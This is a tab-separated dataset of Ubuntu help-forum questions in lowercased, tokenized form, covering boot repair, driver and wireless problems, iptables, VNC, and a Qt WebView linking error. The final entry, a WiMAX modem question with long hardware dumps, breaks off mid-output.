354845	boot repair 'url ' result	i ran boot-repair software to repair the boot of ubuntu 13.04 on my hp pavilion 15 . i am pasting the url it provided at the end . http : //paste.ubuntu.com/6204753/ please can any one help me in this regard .
354848	how to remove amazon from ubuntu ?	how to remove amazon from ubuntu ? if i go to dash and type in privacy..it 's nowhere there to be found . i have written in terminal : `` sudo apt-get remove unity-lens-shopping '' , have put the password and typed y+enter , but still it was in the dash , so i clicked right mouse button on it , and pressed unlock , and it disappeared . does it mean i 've uninstalled it ? please answer , thank you !
354850	i would like to uninstall ubuntu & install it along with window	i have ubuntu 12.04 installed . while installing it i have given full hard disk storage for it . i 'm unable to uninstall it nor am i able to install windows xp along side it . i have tried to shrink space in `` disk utility '' but it showing it is busy error . and i 've also tried following : uninstall ubuntu 12.04 how to remove ubuntu and put windows back on ?
354851	upgrade to 12.10 wo n't show menu or side bar	i have just upgraded my system from 12.04 64 bit to 12.10 64 bit . the system was working well before the upgrade . i have read all about people having similar problems to mine so i have tried many solutions but none have fixed my problem . the video card is a gigabyte gvr455d3-512 i have tried to run root commands such as : sudo apt-get install nvidia-current-updates sudo apt-get install linux-headers-generic sudo apt-get install linux-source sudo apt-get install unity sudo apt-get install ubuntu-desktop i 'm at a loss of what to do next and as i convinced my family to do away with windows , it 's getting mighty hard to keep them to stay with linux when we have not had an upgrade that has not had some sort of problem . this is day 3 and we still do n't have a computer to use , i 'm using my old work laptop that is running ubuntu 12.o4 to type this message .
354853	ubuntu software center/installed	how do you get installed software like sound recorder to open for use when playing sound or music ? for that matter how do get access , like on desk top for any installed software to display icon for use ? if this is old question please direct me , new to ubuntu .
354854	`` xdotool key xf86audioraisevolume '' and ccsm commands not working	i am trying to create a shortcut to increase and decrease volume using compiz config settings manages ( ccsm ) . i enables commands in ccsm . i wrote in command line 0 xdotool key xf86audioraisevolume in tab key bindings - > run command 0 i clicked disabled checked enable - > grab key combination - > < super > u . the problem is the shortcut is not working in a terminal i typed : xdotool key xf86audioraisevolume and it worked ! ! in alt + f2 i typed : xdotool key xf86audioraisevolume and it worked too ! ! i am running ubuntu 13.04 raring . my laptop is acer aspire 5738zg . any help , please .
354855	what does the warning about missing firmware mean and how to fix it ?	i did a fresh ubuntu 13.04 x64 install . right after that , i downloaded and installed the kernel 3.11.3-031103-generic which is running right now . one thing that concerns me is this message : w : possible missing firmware /lib/firmware/rtl_nic/rtl8168g-3.fw for module r8169 w : possible missing firmware /lib/firmware/rtl_nic/rtl8106e-2.fw for module r8169 w : possible missing firmware /lib/firmware/rtl_nic/rtl8411-2.fw for module r8169 it 's there from the begining ! right after installing the kernel . every now and then , when doing a sudo apt-get dist-upgrade , there goes the message . what exactly does that mean ? and , what can i do to fix it ?
354857	which java should i use for ubuntu 13.04 64bit	i 'm new to ubuntu ( but i like it a lot ) , so please bear with me . i want to install java , but which one should i install ? the rpm or the normal one ? 32bit or 64bit ? from what i know , even windows 64 bit is still using java 32 bit . this thing make me confused . i 'm asking here just to make sure everything is going to be all right , because i will need my system to be ready to code ( eclipse : d ) pretty soon , so i want to avoid any trouble now . thanks for your help , and sorry for my basic question .
354860	terminal problems	when i try to install something on my ubuntu i get erors on terminal saying package was n't located . latvietis @ datorslatvietim : ~ $ sudo apt-get update [ sudo ] password for latvietis : e : malformed line 1 in source list /etc/apt/sources.list ( dist parse ) e : the list of sources could not be read . latvietis @ datorslatvietim : ~ $
354862	problems on openerp setup amd64	i have tried to setup openerp via launchpad . everything runs fine , but when i try to start the server , it does not starts and gives no error . also , i am unable to access server from lan . let me explain the steps ( this steps worked fine for ubuntu 12.04.2 lts i386 ) : 1 ) used bazaar to pull all openerp objects ( server , web and addons ) . file locations : /home/user/openerp/server ; /home/user/openerp/web ; /home/user/openerp/addons/ 2 ) setup logfile : sudo mkdir /var/log/openerp sudo chown user : root /var/log/openerp 3 ) put the openerp-server.conf , on /etc folder and set permissions sudo cp /home/user/openerp/server/install/openerp-server.conf /etc/openerp-server.conf sudo chown user : /etc/openerp-server.conf sudo chmod 640 /etc/openerp-server.conf 4 ) changed the file to meet my requirements [ options ] admin_passwd = desired_password db_host = false db_port = false db_user = postgres_user db_password = false addons_path = /home/user/openerp/addons , /home/username/openerp/web/addons logfile = /var/log/openerp/openerp-server.log log_level = error 5 ) put the original openerp-server file on /etc/init.d sudo cp /home/user/openerp-server /etc/init.d sudo chmod 755 /etc/init.d/openerp-server sudo chown root : /etc/init.d/openerp-server 6 ) edited the file /etc/init.d/openerp-server like : daemon=/home/user/openerp/server/openerp-server user = desired_username configfile = â/etc/openerp-server.confâ 7 ) setup logrotate file sudo cp /home/user/openerp/server/install/openerp-server.logrotate /etc/logrotate.d /openerp-server.logrotate sudo chmod 755 /etc/logrotate.d/openerp-server 8 ) setup auto startup sudo update-rc.d openerp-server defaults when i start the server , just get a new command prompt with no message `` starting openerp server '' . the terminal stays as : user @ server : ~ $ sudo /etc/init.d/openerp-server start user @ server : ~ $ the exact same steps works on ubuntu 12.04.2 i386 any idea ?
354863	help configuring iptables rules	so i am accessing my server remotely using putty . i am using port 80 for ssh because port 22 is blocked at my school . i successfully configured iptables to accept port 80 and i dropped all other connections . when i tried doing this with output , my connection was dropped and i could not connect to the session . why cant i connect to the server even though both input and output allow port 80 ? is there anything i can do from school to wipe the iptables rules ?
354868	is it possible to have persistance with an alternative install ( for encryption ) ?	i would like to make a bootable encrypted usb key . i understand that i have to use an alternative install ( and will encrypt the whole key partition ) . would i still be allowed to have persistance ( i want to be able to modify files across sessions ) ? my understanding is that this environment will be fully contained ( no data leaks anywhere as anything stays on the key which is encripted ) am i correct ?
354874	how can i fix sportsdevil add-on in xbmc running on ubuntu 13.04 ?	sportsdevil ( video add-on for live sports ) seems not be working in xbmc across other operating system as well , the issue being `` no stream available '' , but while there are tutorials about how to fix this problem in xbmc running in windows , android and mac os , i could not find any for ubuntu . in windows there is a directory called app data where programs like xbmc store all their data and in that directory some downloaded fix files must be pasted and so on ... i read that ubuntu does not realy have an app data equivalent . so , does anybody know how to address this issue with sportsdevil ? let me explain more ... the zip file to fix sportsdevil can be downloaded and after extracting it , the folder named catchers and the folder named modules , must be copied where xbmc stores all its data in app data directory . that is the first step but this tutorial is for windows os . ps : i 'm fairly new to linux os , so if any of you have instructions , please explain them as much as possible in layman terms aka tutorial for stupids . lol thanks a bunch .
354877	how to view user session using vnc	i want to view ( realtime ) the current session on a remote ubuntu system . i need this for instruction and troubleshooting purposes . i have ssh access to the server with root access . so i 've tried installing vnc4server on the server ( apt-get install vnc4server ) , then login as user ( su - username ) and starting a vnc server ( vncserver :1 ) . but i am kind of stuck with how to use vncviewer . can anyone give me a step by step instruction on how to set this up with me only having ssh access and root access to the server ? i 've heard of x11 forwarding being a feature of x window system but i do n't get how it works with what i 'm trying to do . can anyone please explain in detail . thank you very much .
354890	how to set default terminal to tilda or yakuake when using `` open in terminal '' from folder	when i am inside folder in nautilus i want to be able to open that folder in terminal . this can be done with nautilus-open-terminal package described in where is 'open in terminal ' ? however , i use tilda as my default terminal , because it is drop-down which makes it easy to easy . so my question is - how do i use `` open in terminal '' option to open new tab in tilda instead of default terminal ? this question is about opening terminal from folder , not about opening folder from terminal . opening folder from terminal is easy - you just need to type nautilus .
354891	laggy preview for image sequence in all video editing programs in xubuntu ( kdenlive , openshot , sony vegas via wine )	current os : xubuntu 13.04 at first i thought it was kdenlive 's problem with not being able to preview image sequence in real time without being laggy , and then the same problem happens with other programs ( openshot , pitivi ) so i thought maybe all native linux video editing programs just kind of suck , but then even sony vegas has the exact same problem , then i 'm starting to think maybe i 'm doing something wrong . i tried to use kdenlive to preview the image sequence with vmware in another computer and it plays smoothly . so that proves it further that i might have some problem that causes all these video editing program to not be able to preview image sequence smoothly on my computer ? previewing video clips in all these programs are totally fine . another small note : in both openshot and kdenlive , it seems like the preview does play smoothly for about 2 seconds , and then starts to lag . i 'm using nvidia current driver 304 , i tried switching to nouveau just to see if it changes anything -- nope . i tried turning off compiz -- nope . i unticked `` power saving over performance '' and `` spin down hard disk '' from power management settings , still the same laggy image sequence preview . i do n't understand , my computer is not old . any ideas ?
354893	wireless problem ubuntu 12.04 , rfkill commands not working and no internet access via cable	i am new to ubuntu and i needed it for some college software . after hours of trying , destroying windows , recovering windows etc . i managed to install ubuntu 12.04 . the problem is that on my hp dv6 the wifi switch has the red light on as not working and the only options i find on the wireless applet are : vpn connections enable networking ( with a check ) edit connections ... none of the rfkill commands seem to do anything at all , they do n't even list anything . i do n't have a wired access to the internet so i was wondering if i could fix the issue in another way thanks in advance
354895	extend existing qml component from c++ plugin	first of all , i would like to say that i 'm not very experienced in qt , but i would like to include a new feature in existing qml webview component to set a list of header values , included user agent header , to be sent when requesting a new url . the way to perform it i thought to be subclassing qwebview class ( for example 'mywebview ' extending qwebview ) and register that class with qmlregistertype < mywebview > ( uri , 1 , 0 , `` mywebview '' ) ; i have created a `` qml extension library + tabbed touch ui '' application called myapp to register mywebview class , when coded , using precreated backend class . the only thing i have done until now is creating a first approach .h file this way : # ifndef mywebview_h # define mywebview_h # include < qtwebkitwidgets/qwebview > class mywebview : public qwebview { q_object public : explicit mywebview ( qwebview *parent = 0 ) ; } ; # endif // mywebview_h with this .cpp # include `` mywebview.h '' mywebview : :mywebview ( qwebview *parent ) : qwebview ( parent ) { } i do n't have any device connected to my laptop , so i only use raring ringtail desktop distribution for developing . with this extra added file , compilation works , but when i try to run or debug the project ( to see at least the default myapp.qml working ) these errors are shown : starting /usr/lib/x86_64-linux-gnu/qt5/bin/qmlscene ... file : /// [ debug_path ] /app/myapp.qml:30 type hellotab unavailable file : /// [ debug_path ] /app/ui/hellotab.qml:3 plugin can not be loaded for module `` myapp '' : can not load library [ debug_path ] /backend/modules/myapp/libmyapp.so : ( [ debug_path ] /backend/modules/myapp/libmyapp.so : undefined symbol : _zn8qwebview16staticmetaobjecte ) so i suppose ... is something not well configured ? does you have any idea of what is happenning ? could it be possible the ubuntu version i am using is 64bit ? . whey i execute ldd -r libmyapp.so there are may lines saying webkit classes are undefined : linux-vdso.so.1 = > ( 0x00007ffffb5d1000 ) libqt5qml.so.5 = > /usr/lib/x86_64-linux-gnu/libqt5qml.so.5 ( 0x00007ff9e1baa000 ) libqt5core.so.5 = > /usr/lib/x86_64-linux-gnu/libqt5core.so.5 ( 0x00007ff9e1595000 ) libstdc++.so.6 = > /usr/lib/x86_64-linux-gnu/libstdc++.so.6 ( 0x00007ff9e1291000 ) libgcc_s.so.1 = > /lib/x86_64-linux-gnu/libgcc_s.so.1 ( 0x00007ff9e107b000 ) libc.so.6 = > /lib/x86_64-linux-gnu/libc.so.6 ( 0x00007ff9e0cb3000 ) libqt5network.so.5 = > /usr/lib/x86_64-linux-gnu/libqt5network.so.5 ( 0x00007ff9e097b000 ) libqt5v8.so.5 = > /usr/lib/x86_64-linux-gnu/libqt5v8.so.5 ( 0x00007ff9e0337000 ) libm.so.6 = > /lib/x86_64-linux-gnu/libm.so.6 ( 0x00007ff9e0032000 ) libpthread.so.0 = > /lib/x86_64-linux-gnu/libpthread.so.0 ( 0x00007ff9dfe14000 ) libz.so.1 = > /lib/x86_64-linux-gnu/libz.so.1 ( 0x00007ff9dfbfd000 ) libicui18n.so.48 = > /usr/lib/x86_64-linux-gnu/libicui18n.so.48 ( 0x00007ff9df837000 ) libicuuc.so.48 = > /usr/lib/x86_64-linux-gnu/libicuuc.so.48 ( 0x00007ff9df4cb000 ) libdl.so.2 = > /lib/x86_64-linux-gnu/libdl.so.2 ( 0x00007ff9df2c7000 ) libglib-2.0.so.0 = > /lib/x86_64-linux-gnu/libglib-2.0.so.0 ( 0x00007ff9defcb000 ) librt.so.1 = > /lib/x86_64-linux-gnu/librt.so.1 ( 0x00007ff9dedc2000 ) /lib64/ld-linux-x86-64.so.2 ( 0x00007ff9e2205000 ) libicudata.so.48 = > /usr/lib/x86_64-linux-gnu/libicudata.so.48 ( 0x00007ff9dda52000 ) libpcre.so.3 = > /lib/x86_64-linux-gnu/libpcre.so.3 ( 0x00007ff9dd812000 ) undefined symbol : _zn8qwebview16staticmetaobjecte ( ./libmyapp.so ) undefined symbol : _zn8qwebview5eventep6qevent ( ./libmyapp.so ) undefined symbol : _znk7qwidget7devtypeev ( ./libmyapp.so ) undefined symbol : _zn7qwidget10setvisibleeb ( ./libmyapp.so ) undefined symbol : _znk8qwebview8sizehintev ( ./libmyapp.so ) undefined symbol : _znk7qwidget15minimumsizehintev ( ./libmyapp.so ) undefined symbol : _znk7qwidget14heightforwidthei ( ./libmyapp.so ) undefined symbol : _znk7qwidget17hasheightforwidthev ( ./libmyapp.so ) undefined symbol : _znk7qwidget11paintengineev ( ./libmyapp.so ) undefined symbol : _zn8qwebview15mousepresseventep11qmouseevent ( ./libmyapp.so ) undefined symbol : _zn8qwebview17mousereleaseeventep11qmouseevent ( ./libmyapp.so ) undefined symbol : _zn8qwebview21mousedoubleclickeventep11qmouseevent ( ./libmyapp.so ) undefined symbol : _zn8qwebview14mousemoveeventep11qmouseevent ( ./libmyapp.so ) undefined symbol : _zn8qwebview10wheeleventep11qwheelevent ( ./libmyapp.so ) undefined symbol : _zn8qwebview13keypresseventep9qkeyevent ( ./libmyapp.so ) undefined symbol : _zn8qwebview15keyreleaseeventep9qkeyevent ( ./libmyapp.so ) undefined symbol : _zn8qwebview12focusineventep11qfocusevent ( ./libmyapp.so ) undefined symbol : _zn8qwebview13focusouteventep11qfocusevent ( ./libmyapp.so ) undefined symbol : _zn7qwidget10entereventep6qevent ( ./libmyapp.so ) undefined symbol : _zn7qwidget10leaveeventep6qevent ( ./libmyapp.so ) undefined symbol : _zn8qwebview10painteventep11qpaintevent ( ./libmyapp.so ) undefined symbol : _zn7qwidget9moveeventep10qmoveevent ( ./libmyapp.so ) undefined symbol : _zn8qwebview11resizeeventep12qresizeevent ( ./libmyapp.so ) undefined symbol : _zn7qwidget10closeeventep11qcloseevent ( ./libmyapp.so ) undefined symbol : _zn8qwebview16contextmenueventep17qcontextmenuevent ( ./libmyapp.so ) undefined symbol : _zn7qwidget11tableteventep12qtabletevent ( ./libmyapp.so ) undefined symbol : _zn7qwidget11actioneventep12qactionevent ( ./libmyapp.so ) undefined symbol : _zn8qwebview14dragentereventep15qdragenterevent ( ./libmyapp.so ) undefined symbol : _zn8qwebview13dragmoveeventep14qdragmoveevent ( ./libmyapp.so ) undefined symbol : _zn8qwebview14dragleaveeventep15qdragleaveevent ( ./libmyapp.so ) undefined symbol : _zn8qwebview9dropeventep10qdropevent ( ./libmyapp.so ) undefined symbol : _zn7qwidget9showeventep10qshowevent ( ./libmyapp.so ) undefined symbol : _zn7qwidget9hideeventep10qhideevent ( ./libmyapp.so ) undefined symbol : _zn7qwidget11nativeeventerk10qbytearraypvpl ( ./libmyapp.so ) undefined symbol : _zn8qwebview11changeeventep6qevent ( ./libmyapp.so ) undefined symbol : _znk7qwidget6metricen12qpaintdevice17paintdevicemetrice ( ./libmyapp.so ) undefined symbol : _znk7qwidget11initpainterep8qpainter ( ./libmyapp.so ) undefined symbol : _znk7qwidget10redirectedep6qpoint ( ./libmyapp.so ) undefined symbol : _znk7qwidget13sharedpainterev ( ./libmyapp.so ) undefined symbol : _zn8qwebview16inputmethodeventep17qinputmethodevent ( ./libmyapp.so ) undefined symbol : _znk8qwebview16inputmethodqueryen2qt16inputmethodquerye ( ./libmyapp.so ) undefined symbol : _zn8qwebview18focusnextprevchildeb ( ./libmyapp.so ) undefined symbol : _zn8qwebview12createwindowen8qwebpage13webwindowtypee ( ./libmyapp.so ) undefined symbol : _zthn16_nk7qwidget7devtypeev ( ./libmyapp.so ) undefined symbol : _zthn16_nk7qwidget11paintengineev ( ./libmyapp.so ) undefined symbol : _zthn16_nk7qwidget6metricen12qpaintdevice17paintdevicemetrice ( ./libmyapp.so ) undefined symbol : _zthn16_nk7qwidget11initpainterep8qpainter ( ./libmyapp.so ) undefined symbol : _zthn16_nk7qwidget10redirectedep6qpoint ( ./libmyapp.so ) undefined symbol : _zthn16_nk7qwidget13sharedpainterev ( ./libmyapp.so ) undefined symbol : _zti8qwebview ( ./libmyapp.so ) undefined symbol : _zn8qwebpage16staticmetaobjecte ( ./libmyapp.so ) undefined symbol : _zn8qwebpage5eventep6qevent ( ./libmyapp.so ) undefined symbol : _zn8qwebpage13triggeractionens_9webactioneb ( ./libmyapp.so ) undefined symbol : _zn8qwebpage9extensionens_9extensionepkns_15extensionoptionepns_15extensionreturne ( ./libmyapp.so ) undefined symbol : _znk8qwebpage17supportsextensionens_9extensione ( ./libmyapp.so ) undefined symbol : _zn8qwebpage25shouldinterruptjavascriptev ( ./libmyapp.so ) undefined symbol : _zn8qwebpage12createwindowens_13webwindowtypee ( ./libmyapp.so ) undefined symbol : _zn8qwebpage12createpluginerk7qstringrk4qurlrk11qstringlists8_ ( ./libmyapp.so ) undefined symbol : _zn8qwebpage23acceptnavigationrequestep9qwebframerk15qnetworkrequestns_14navigationtypee ( ./libmyapp.so ) undefined symbol : _zn8qwebpage10choosefileep9qwebframerk7qstring ( ./libmyapp.so ) undefined symbol : _zn8qwebpage15javascriptalertep9qwebframerk7qstring ( ./libmyapp.so ) undefined symbol : _zn8qwebpage17javascriptconfirmep9qwebframerk7qstring ( ./libmyapp.so ) undefined symbol : _zn8qwebpage16javascriptpromptep9qwebframerk7qstrings4_ps2_ ( ./libmyapp.so ) undefined symbol : _zn8qwebpage24javascriptconsolemessageerk7qstringis2_ ( ./libmyapp.so ) undefined symbol : _znk8qwebpage15useragentforurlerk4qurl ( ./libmyapp.so ) undefined symbol : _zti8qwebpage ( ./libmyapp.so ) undefined symbol : _zn8qwebview11qt_metacastepkc ( ./libmyapp.so ) undefined symbol : _zn8qwebviewd2ev ( ./libmyapp.so ) undefined symbol : _zn8qwebview11qt_metacallen11qmetaobject4calleippv ( ./libmyapp.so ) undefined symbol : _zn8qwebpage11qt_metacallen11qmetaobject4calleippv ( ./libmyapp.so ) undefined symbol : _zn8qwebviewc2ep7qwidget ( ./libmyapp.so ) undefined symbol : _zn8qwebpaged2ev ( ./libmyapp.so ) undefined symbol : _zn8qwebpage11qt_metacastepkc ( ./libmyapp.so ) undefined symbol : _zn8qwebpagec2ep7qobject ( ./libmyapp.so )
354899	lenovo ideapad z580 super hot after ubuntu 12.04	so i have a z580 laptop which has only ubuntu 12.04 installed , it has a i3 processor with intel and nvidia cards and 4gb ram , the problem is even if i run no apps , it gets heated up ? i removed windows 7 completely while installing ubuntu ... .. btw my nvidia card is a geforce with cuda can somebody please help me ? edit : i found out that installing drivers for your card is a solution but i installed nvidia drivers from the additional driver menu , but i really do n't feel any change ... .
354901	having issue with foxconn/beecems pxu1900 from clear wireless	i have an asus usb n53 wifi adapter ubuntu recognizes this just fine , and can access internet via my apartment 's wifi ; however , i have a connection with clear wireless that works in windows ( and is significantly faster ) . the clear device is a pxu 1900 with manufacturer listed as foxconn/hon hai and it seems to also appear under the name beecems bcsm250 . i did some research and discovered that beecems manufactures for only oems under many labels . now , i can not find drivers or support for this wireless broadband modem . has anyone had any luck with getting one of these to work ? suggestions or ideas ? the os recognizes the modem , however , it may not recognize that it is actually a modem . as when i run iwconfig , it shows nothing available . when i run ifconfig , it picks up the asus , but not the foxconn , and when i run lsusb , it picks it up , finally , and shows the name/manufacturer/etc . this is lshw : description : computer width : 64 bits capabilities : vsyscall32 *-core description : motherboard physical id : 0 *-memory description : system memory physical id : 0 size : 7904mib *-cpu product : amd fx ( tm ) -8350 eight-core processor vendor : advanced micro devices [ amd ] physical id : 1 bus info : cpu @ 0 width : 64 bits capabilities : fpu fpu_exception wp vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush mmx fxsr sse sse2 ht syscall nx mmxext fxsr_opt pdpe1gb rdtscp x86-64 constant_tsc rep_good nopl nonstop_tsc extd_apicid aperfmperf pni pclmulqdq monitor ssse3 fma cx16 sse4_1 sse4_2 popcnt aes xsave avx f16c lahf_lm cmp_legacy svm extapic cr8_legacy abm sse4a misalignsse 3dnowprefetch osvw ibs xop skinit wdt lwp fma4 tce nodeid_msr tbm topoext perfctr_core arat cpb hw_pstate npt lbrv svm_lock nrip_save tsc_scale vmcb_clean flushbyasid decodeassists pausefilter pfthreshold bmi1 *-pci:0 description : host bridge product : rd890 pci to pci bridge ( external gfx0 port b ) vendor : advanced micro devices [ amd ] nee ati physical id : 100 bus info : pci @ 0000:00:00.0 version : 02 width : 32 bits clock : 33mhz *-pci:0 description : pci bridge product : rd890 pci to pci bridge ( pci express gpp port b ) vendor : advanced micro devices [ amd ] nee ati physical id : 2 bus info : pci @ 0000:00:02.0 version : 00 width : 32 bits clock : 33mhz capabilities : pci normal_decode bus_master cap_list configuration : driver=pcieport resources : irq:52 ioport : e000 ( size=4096 ) memory : fea00000-feafffff ioport : c0000000 ( size=268435456 ) *-display description : vga compatible controller product : tahiti le [ radeon hd 7870 xt ] vendor : advanced micro devices [ amd ] nee ati physical id : 0 bus info : pci @ 0000:01:00.0 version : 00 width : 64 bits clock : 33mhz capabilities : vga_controller bus_master cap_list rom configuration : driver=radeon latency=0 resources : irq:89 memory : c0000000-cfffffff memory : fea00000-fea3ffff ioport : e000 ( size=256 ) memory : fea40000-fea5ffff *-multimedia description : audio device product : tahiti xt hdmi audio [ radeon hd 7970 series ] vendor : advanced micro devices [ amd ] nee ati physical id : 0.1 bus info : pci @ 0000:01:00.1 version : 00 width : 64 bits clock : 33mhz capabilities : bus_master cap_list configuration : driver=snd_hda_intel latency=0 resources : irq:90 memory : fea60000-fea63fff *-pci:1 description : pci bridge product : rd890 pci to pci bridge ( pci express gpp port d ) vendor : advanced micro devices [ amd ] nee ati physical id : 4 bus info : pci @ 0000:00:04.0 version : 00 width : 32 bits clock : 33mhz capabilities : pci normal_decode bus_master cap_list configuration : driver=pcieport resources : irq:52 ioport : d000 ( size=4096 ) ioport : d0000000 ( size=1048576 ) *-network description : ethernet interface product : rtl8111/8168 pci express gigabit ethernet controller vendor : realtek semiconductor co. , ltd. physical id : 0 bus info : pci @ 0000:02:00.0 logical name : eth0 version : 09 serial : 74 : d0:2b:32:2f:2d size : 10mbit/s capacity : 1gbit/s width : 64 bits clock : 33mhz capabilities : bus_master cap_list ethernet physical tp mii 10bt 10bt-fd 100bt 100bt-fd 1000bt 1000bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=r8169 driverversion=2.3lk-napi duplex=half firmware=rtl8168f-1_0.0.5 06/18/12 latency=0 link=no multicast=yes port=mii speed=10mbit/s resources : irq:88 ioport : d000 ( size=256 ) memory : d0004000-d0004fff memory : d0000000-d0003fff *-pci:2 description : pci bridge product : rd890 pci to pci bridge ( pci express gpp port e ) vendor : advanced micro devices [ amd ] nee ati physical id : 5 bus info : pci @ 0000:00:05.0 version : 00 width : 32 bits clock : 33mhz capabilities : pci normal_decode bus_master cap_list configuration : driver=pcieport resources : irq:52 memory : fe900000-fe9fffff *-usb description : usb controller product : asm1042 superspeed usb host controller vendor : asmedia technology inc. physical id : 0 bus info : pci @ 0000:03:00.0 version : 00 width : 64 bits clock : 33mhz capabilities : xhci bus_master cap_list configuration : driver=xhci_hcd latency=0 resources : irq:46 memory : fe900000-fe907fff *-pci:3 description : pci bridge product : rd890 pci to pci bridge ( pci express gpp port g ) vendor : advanced micro devices [ amd ] nee ati physical id : 7 bus info : pci @ 0000:00:07.0 version : 00 width : 32 bits clock : 33mhz capabilities : pci normal_decode bus_master cap_list configuration : driver=pcieport resources : irq:53 memory : fe800000-fe8fffff *-usb description : usb controller product : asm1042 superspeed usb host controller vendor : asmedia technology inc. physical id : 0 bus info : pci @ 0000:04:00.0 version : 00 width : 64 bits clock : 33mhz capabilities : xhci bus_master cap_list configuration : driver=xhci_hcd latency=0 resources : irq:50 memory : fe800000-fe807fff *-storage description : sata controller product : sb7x0/sb8x0/sb9x0 sata controller [ ahci mode ] vendor : advanced micro devices [ amd ] nee ati physical id : 11 bus info : pci @ 0000:00:11.0 version : 40 width : 32 bits clock : 66mhz capabilities : storage ahci_1.0 bus_master cap_list configuration : driver=ahci latency=32 resources : irq:19 ioport : f040 ( size=8 ) ioport : f030 ( size=4 ) ioport : f020 ( size=8 ) ioport : f010 ( size=4 ) ioport : f000 ( size=16 ) memory : feb0b000-feb0b3ff *-usb:0 description : usb controller product : sb7x0/sb8x0/sb9x0 usb ohci0 controller vendor : advanced micro devices [ amd ] nee ati physical id : 12 bus info : pci @ 0000:00:12.0 version : 00 width : 32 bits clock : 66mhz capabilities : ohci bus_master configuration : driver=ohci_hcd latency=32 resources : irq:18 memory : feb0a000-feb0afff *-usb:1 description : usb controller product : sb7x0/sb8x0/sb9x0 usb ehci controller vendor : advanced micro devices [ amd ] nee ati physical id : 12.2 bus info : pci @ 0000:00:12.2 version : 00 width : 32 bits clock : 66mhz capabilities : ehci bus_master cap_list configuration : driver=ehci-pci latency=32 resources : irq:17 memory : feb09000-feb090ff *-usb:2 description : usb controller product : sb7x0/sb8x0/sb9x0 usb ohci0 controller vendor : advanced micro devices [ amd ] nee ati physical id : 13 bus info : pci @ 0000:00:13.0 version : 00 width : 32 bits clock : 66mhz capabilities : ohci bus_master configuration : driver=ohci_hcd latency=32 resources : irq:20 memory : feb08000-feb08fff *-usb:3 description : usb controller product : sb7x0/sb8x0/sb9x0 usb ehci controller vendor : advanced micro devices [ amd ] nee ati physical id : 13.2 bus info : pci @ 0000:00:13.2 version : 00 width : 32 bits clock : 66mhz capabilities : ehci bus_master cap_list configuration : driver=ehci-pci latency=32 resources : irq:21 memory : feb07000-feb070ff *-serial description : smbus product : sbx00 smbus controller vendor : advanced micro devices [ amd ] nee ati physical id : 14 bus info : pci @ 0000:00:14.0 version : 42 width : 32 bits clock : 66mhz configuration : driver=piix4_smbus latency=0 resources : irq:0 *-multimedia description : audio device product : sbx00 azalia ( intel hda ) vendor : advanced micro devices [ amd ] nee ati physical id : 14.2 bus info : pci @ 0000:00:14.2 version : 40 width : 64 bits clock : 33mhz capabilities : bus_master cap_list configuration : driver=snd_hda_intel latency=32 resources : irq:16 memory : feb00000-feb03fff *-isa description : isa bridge product : sb7x0/sb8x0/sb9x0 lpc host controller vendor : advanced micro devices [ amd ] nee ati physical id : 14.3 bus info : pci @ 0000:00:14.3 version : 40 width : 32 bits clock : 66mhz capabilities : isa bus_master configuration : latency=0 *-pci:4 description : pci bridge product : sbx00 pci to pci bridge vendor : advanced micro devices [ amd ] nee ati physical id : 14.4 bus info : pci @ 0000:00:14.4 version : 40 width : 32 bits clock : 66mhz capabilities : pci subtractive_decode bus_master vga_palette *-usb:4 description : usb controller product : sb7x0/sb8x0/sb9x0 usb ohci2 controller vendor : advanced micro devices [ amd ] nee ati physical id : 14.5 bus info : pci @ 0000:00:14.5 version : 00 width : 32 bits clock : 66mhz capabilities : ohci bus_master configuration : driver=ohci_hcd latency=32 resources : irq:18 memory : feb06000-feb06fff *-usb:5 description : usb controller product : sb7x0/sb8x0/sb9x0 usb ohci0 controller vendor : advanced micro devices [ amd ] nee ati physical id : 16 bus info : pci @ 0000:00:16.0 version : 00 width : 32 bits clock : 66mhz capabilities : ohci bus_master configuration : driver=ohci_hcd latency=32 resources : irq:22 memory : feb05000-feb05fff *-usb:6 description : usb controller product : sb7x0/sb8x0/sb9x0 usb ehci controller vendor : advanced micro devices [ amd ] nee ati physical id : 16.2 bus info : pci @ 0000:00:16.2 version : 00 width : 32 bits clock : 66mhz capabilities : ehci bus_master cap_list configuration : driver=ehci-pci latency=32 resources : irq:23 memory : feb04000-feb040ff *-pci:1 description : host bridge product : family 15h processor function 0 vendor : advanced micro devices [ amd ] physical id : 101 bus info : pci @ 0000:00:18.0 version : 00 width : 32 bits clock : 33mhz *-pci:2 description : host bridge product : family 15h processor function 1 vendor : advanced micro devices [ amd ] physical id : 102 bus info : pci @ 0000:00:18.1 version : 00 width : 32 bits clock : 33mhz *-pci:3 description : host bridge product : family 15h processor function 2 vendor : advanced micro devices [ amd ] physical id : 103 bus info : pci @ 0000:00:18.2 version : 00 width : 32 bits clock : 33mhz *-pci:4 description : host bridge product : family 15h processor function 3 vendor : advanced micro devices [ amd ] physical id : 104 bus info : pci @ 0000:00:18.3 version : 00 width : 32 bits clock : 33mhz configuration : driver=k10temp resources : irq:0 *-pci:5 description : host bridge product : family 15h processor function 4 vendor : advanced micro devices [ amd ] physical id : 105 bus info : pci @ 0000:00:18.4 version : 00 width : 32 bits clock : 33mhz configuration : driver=fam15h_power resources : irq:0 *-pci:6 description : host bridge product : family 15h processor function 5 vendor : advanced micro devices [ amd ] physical id : 106 bus info : pci @ 0000:00:18.5 version : 00 width : 32 bits clock : 33mhz *-network description : wireless interface physical id : 1 bus info : usb @ 8:2 logical name : wlan0 serial : 50:46:5d:4b : be : c4 capabilities : ethernet physical wireless configuration : broadcast=yes driver=rt2800usb driverversion=3.8.0-31-generic firmware=0.29 ip=10.2.152.101 link=yes multicast=yes wireless=ieee 802.11abgn this is lsusb -d 0489 : e016 -v : bus 001 device 002 : id 0489 : e016 foxconn / hon hai ubee pxu1900 wimax adapter [ beceem bcsm250 ] device descriptor : blength 18 bdescriptortype 1 bcdusb 2.00 bdeviceclass 255 vendor specific class bdevicesubclass 255 vendor specific subclass bdeviceprotocol 255 vendor specific protocol bmaxpacketsize0 64 idvendor 0x0489 foxconn / hon hai idproduct 0xe016 ubee pxu1900 wimax adapter [ beceem bcsm250 ] bcddevice 0.01 imanufacturer 1 ubee interactive iproduct 2 clear 4g mobile usb - pxu190 iserial 3 usb_sn_1 bnumconfigurations 1 configuration descriptor : blength 9 bdescriptortype 2 wtotallength 111 bnuminterfaces 1 bconfigurationvalue 1 iconfiguration 0 bmattributes 0xa0 ( bus powered ) remote wakeup maxpower 500ma interface 